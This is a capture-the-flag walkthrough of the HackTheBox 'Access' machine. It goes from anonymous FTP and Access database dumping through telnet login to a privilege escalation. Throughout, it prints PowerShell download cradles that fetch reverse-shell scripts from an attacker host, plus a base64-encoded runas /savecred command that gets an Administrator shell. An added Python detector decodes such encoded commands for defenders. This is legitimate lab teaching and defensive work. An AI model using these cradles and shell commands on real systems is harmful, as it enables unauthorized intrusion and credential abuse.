# HackTheBox - Access

![](/files/-MY3iU2D7bhkud_zX8Eu)

### Nmap scan results (Basic and all port)

![](/files/-MY3ik6G6N40rw41qaF4)

```
nmap -sC -sV -oA nmap-access 10.10.10.98
```

![](/files/-MY3jcRaHU82aA2JfpVl)

### FTP Enumeration

Anonymous FTP access is allowed, so we can download all the files present on that share.

![](/files/-MY3koKJbXxz6eTMWadH)

We get the `AccessControl.zip` and `backup.mdb` files from the FTP server.

> A file with the **MDB** file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... **MDB** files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint.

### Exploring mdbtools

```
apt-get install mdbtools
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files
```

The first command installs `mdbtools`, the toolset required for analyzing the `backup.mdb` file; the second mirrors every file from the FTP server.

We can list all the tables using the `mdb-tables` or `mdb-sql` command.

Using mdb-tables:

![](/files/-MY3pyXltmMTaoI9BfLf)

Using mdb-sql:

![](/files/-MY3q743ICITBbF0l0se)

To extract the information from the tables, we can use `mdb-json`.

```
# Dump every table in the database as JSON
for i in $(mdb-tables backup.mdb); do mdb-json backup.mdb "$i"; done
```

![](/files/-MY3qLocpDh0oI287_pK)

The password for the zip file is stored inside this `backup.mdb` file, and we can search for it.

![](/files/-MY3qkkJaP0K0q9qEu05)

![](/files/-MY3rXhrfL1O8m25LYiE)

### Analyzing .pst file using readpst

We can convert the .pst file into a human-readable .mbox file using the `readpst` command.

![](/files/-MY3y2EJ9J25MEerioGm)

![](/files/-MY3yVUwN38pX28U7xyt)

### Using Telnet to get shell access

The password for the security account is changed to `4Cc3ssC0ntr0ller`.

We can use telnet to get shell access as the security user.

![](/files/-MY3z8XSGx8rfv8CZtsL)

This shell is not really stable, and we need a stable shell for further enumeration, so we will use the Nishang shells from [GitHub](https://github.com/samratashok/nishang/tree/master/Shells).

![](/files/-MY3zopyAAIXs1jKZSLB)

```
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')"
```

Make sure to add this line at the end of the script so that it runs as soon as the script is downloaded on the target computer.

![](/files/-MY4-knmwY190aEB4y_H)

![](/files/-MY4-oxSR37QGglkLKaQ)

### Running JAWS script for system enumeration

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')
```

![](/files/-MY43Xtl-JpMaL7U65m-)

![Keep this in mind: cmdkey /list ](/files/-MY43xx0UEkRqmKrc5EV)

We find a very interesting file under `C:\Users\Public\Desktop`.

![](/files/-MY44cEOdDHGeMKBm7Rg)

### Privilege Escalation

We can view the raw contents of the file using the `Get-Content` command in PowerShell, or we can inspect the shortcut another way:

```
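# Load the shortcut through the WScript.Shell COM object
$WScript = New-Object -ComObject Wscript.Shell
$shortcut = Get-ChildItem *.lnk
# Prints the shortcut's properties, including its target path and arguments
$WScript.CreateShortcut($shortcut)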
```

![](/files/-MY45ELs49VbxlAEANgp)

We can run this command as Administrator, so we will try to get a reverse shell this way.

![](/files/-MY47dNxhrqiUHcgQZWt)

We changed the port to 9002 since we already have a connection on port 9001. So now we need to use a base64-encoded string to run certain Windows commands.

```
echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
```

Windows uses UTF-16 Little Endian, so we convert the string with `iconv` first and then base64-encode it. The `-w` flag of `base64` specifies `wrap encoded lines after COLS character`; `-w 0` disables line wrapping, so the output is a single line.

```
runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="
```
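For triage on the defending side, the encoding step above can be reversed. This added example (not part of the original write-up) decodes a `-EncodedCommand` argument from a logged command line and flags the download cradle and `runas /savecred`; the function names, the indicator list and the rebuilt sample line are assumptions made for illustration.

```python
import base64
import re

# Matches "-<flag> <base64>"; the flag itself is validated separately below.
ENC_ARG = re.compile(r'[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{8,}={0,2})')
# Strings worth flagging in the decoded script (illustrative, not exhaustive).
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient")

def is_encoded_flag(flag):
    """powershell.exe accepts any prefix of -EncodedCommand, plus -ec."""
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)

def decode_encoded_command(cmdline):
    """Return the decoded script from a command line, or None if absent."""
    for flag, blob in ENC_ARG.findall(cmdline):
        if not is_encoded_flag(flag):
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")  # the payload is UTF-16LE text
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 / UTF-16LE, keep scanning
    return None

def triage(cmdline):
    """Summarise one process command line for an analyst."""
    script = decode_encoded_command(cmdline)
    low = (script or "").lower()
    return {
        "decoded": script,
        "hits": [i for i in INDICATORS if i in low],
        "savecred": bool(re.search(r'\brunas(\.exe)?\b.*/savecred\b', cmdline, re.I)),
    }

# Constructed sample: the page's runas line, rebuilt from its plaintext the same
# way as `iconv --to-code UTF-16LE | base64 -w 0` (echo appends the trailing \n).
PLAIN = "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')\n"
BLOB = base64.b64encode(PLAIN.encode("utf-16-le")).decode()
SAMPLE = f'runas /user:ACCESS\\Administrator /savecred "Powershell -EncodedCommand {BLOB}"'

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run against process-creation logs, a line that returns both `savecred: True` and a download-cradle hit is a strong lead that stored credentials were used to launch a remote script.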

![](/files/-MY49WxW9jf6jAgF-vge)

{% hint style="info" %}
Note: If we want to access or read all the recently cracked hashes, then we can use the following command. `cat ~/.john/john.pot`
{% endhint %}

